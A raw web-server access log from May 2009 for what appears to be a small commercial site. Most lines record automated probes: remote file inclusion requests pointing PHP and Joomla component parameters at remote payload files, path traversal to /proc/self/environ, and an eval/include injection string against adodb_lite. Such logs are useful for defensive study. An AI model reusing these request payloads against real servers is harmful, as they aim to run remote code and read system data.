65.23.154.225 - - [20/May/2009:00:31:42 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
171.64.75.45 - - [20/May/2009:00:32:01 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
171.64.75.45 - - [20/May/2009:00:32:01 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:00:33:06 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:33:06 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:33:06 -0400] "GET /logs/access_log.Q109030500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:33:06 -0400] "GET /logs/access_log.Q109042600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:33:11 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:33:11 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:33:11 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:33:11 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:00:33:11 -0400] "GET /images/index4_imp_air_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET //popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs//popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs/access_log.Q108090200//popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs/error_log.Q109050800//popup_window.php?site_isp_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs/error_log.Q109050800/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [20/May/2009:00:34:25 -0400] "GET /logs/access_log.Q108090200/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET //popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 220 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs/error_log.Q109050800//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 241 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs/access_log.Q108090200//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET //popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs/error_log.Q109050800//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:34:26 -0400] "GET /logs/access_log.Q108090200//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
91.184.52.10 - - [20/May/2009:00:34:37 -0400] "GET /logs/access_log.Q108091400//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.10 - - [20/May/2009:00:34:51 -0400] "GET /logs/access_log.Q109051000//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:34:57 -0400] "GET //appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:34:57 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:34:57 -0400] "GET /logs/access_log.Q108051700//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:34:59 -0400] "GET //appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:35:04 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:00:35:04 -0400] "GET /logs/access_log.Q108051700//appserv/main.php?appserv_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.199.222.19 - - [20/May/2009:00:35:30 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://cameraexchange.com.au/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:35:49 -0400] "GET /logs/access_log.Q108090100%20/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
218.27.203.107 - - [20/May/2009:00:36:00 -0400] "GET //?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:00:36:00 -0400] "GET /logs//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 2093 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:00:36:00 -0400] "GET /logs/access_log.Q108092100%20%20//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:36:10 -0400] "GET /logs/access_log.Q108090100%20/phphtml.php?htmlclass_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2009:00:36:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.240.12.4 - - [20/May/2009:00:36:18 -0400] "GET /logs/access_log.Q109050900//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.2.7.227 - - [20/May/2009:00:36:31 -0400] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
88.2.7.227 - - [20/May/2009:00:36:32 -0400] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
88.2.7.227 - - [20/May/2009:00:36:32 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
88.2.7.227 - - [20/May/2009:00:36:33 -0400] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 229 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:36:33 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
88.2.7.227 - - [20/May/2009:00:36:33 -0400] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 229 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:36:34 -0400] "GET /logs/access_log.Q108090100/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
88.2.7.227 - - [20/May/2009:00:36:34 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
218.1.64.133 - - [20/May/2009:00:36:34 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
88.2.7.227 - - [20/May/2009:00:36:34 -0400] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 224 "-" "XXXXXX"
88.2.7.227 - - [20/May/2009:00:36:35 -0400] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:36:35 -0400] "GET /logs/access_log.Q108090100/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
216.119.103.12 - - [20/May/2009:00:36:41 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:00:36:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
216.119.103.12 - - [20/May/2009:00:36:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
82.94.179.43 - - [20/May/2009:00:36:55 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/)"
82.94.179.43 - - [20/May/2009:00:36:55 -0400] "GET /logs/access_log.Q108112300 HTTP/1.0" 404 224 "http://www.virtualist.nl/search/index.php-component-option,com_rss-feed,OPML-no_html,1-index.php" "Mozilla/4.0 (compatible; Vagabondo/4.0Beta; webcrawler at wise-guys dot nl; http://webagent.wise-guys.nl/; http://www.wise-guys.nl/)"
66.249.72.114 - - [20/May/2009:00:37:18 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [20/May/2009:00:37:18 -0400] "GET /logs/access_log.Q108092700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.223.86.126 - - [20/May/2009:00:37:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
72.223.86.126 - - [20/May/2009:00:37:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
72.223.86.126 - - [20/May/2009:00:37:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
72.223.86.126 - - [20/May/2009:00:37:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
210.240.12.4 - - [20/May/2009:00:37:34 -0400] "GET /logs/access_log.Q109022600//skin/zero_vote/ask_password.php?dir=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:37:40 -0400] "GET /logs/access_log.Q109030500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:00:37:40 -0400] "GET /logs/access_log.Q109042600%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.1.64.133 - - [20/May/2009:00:38:32 -0400] "GET /logs/access_log.Q108052400//phplinks/includes/smarty.php?full_path_to_public_program=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [20/May/2009:00:38:32 -0400] "GET //phplinks/includes/smarty.php?full_path_to_public_program=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [20/May/2009:00:38:32 -0400] "GET /logs//phplinks/includes/smarty.php?full_path_to_public_program=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET /logs/access_log.Q108052400/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET /logs/access_log.Q108052400//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET //phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:38:33 -0400] "GET /logs//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:38:34 -0400] "GET /logs/access_log.Q108052400//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:38:34 -0400] "GET //phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
218.1.64.133 - - [20/May/2009:00:38:34 -0400] "GET /logs//phplinks/includes/smarty.php?full_path_to_public_program=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
87.106.135.14 - - [20/May/2009:00:39:31 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:00:39:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:00:39:32 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
72.30.142.171 - - [20/May/2009:00:39:48 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.0" 200 45921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.184.52.10 - - [20/May/2009:00:39:53 -0400] "GET /logs/access_log.Q108073000//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.98.226 - - [20/May/2009:00:40:07 -0400] "GET /logs/error_log.Q109050600/errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.214.98.226 - - [20/May/2009:00:40:07 -0400] "GET /errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.214.98.226 - - [20/May/2009:00:40:07 -0400] "GET /logs/errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
221.139.104.104 - - [20/May/2009:00:40:37 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
91.184.52.10 - - [20/May/2009:00:40:41 -0400] "GET /logs/access_log.Q108091400//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.10 - - [20/May/2009:00:40:51 -0400] "GET /logs/access_log.Q109051000//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:00:41:12 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:00:41:12 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:00:41:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/3.0 (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:41:17 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:41:19 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:41:19 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:41:19 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.154.225 - - [20/May/2009:00:41:19 -0400] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (OS/2; U)"
65.23.154.225 - - [20/May/2009:00:41:20 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
65.23.154.225 - - [20/May/2009:00:41:20 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
69.248.128.84 - - [20/May/2009:00:41:30 -0400] "GET //admin/classes/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
88.84.128.40 - - [20/May/2009:00:41:37 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:00:41:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:00:41:38 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
200.32.100.130 - - [20/May/2009:00:41:49 -0400] "GET /logs/access_log.Q109022600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:00:41:56 -0400] "GET /images/store_handpc_section.jpg.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
72.30.142.171 - - [20/May/2009:00:42:23 -0400] "GET /logs/error_log.Q107070100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.23.154.225 - - [20/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108090200/components/com_performs/performs.php?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/3.0 (OS/2; U)"
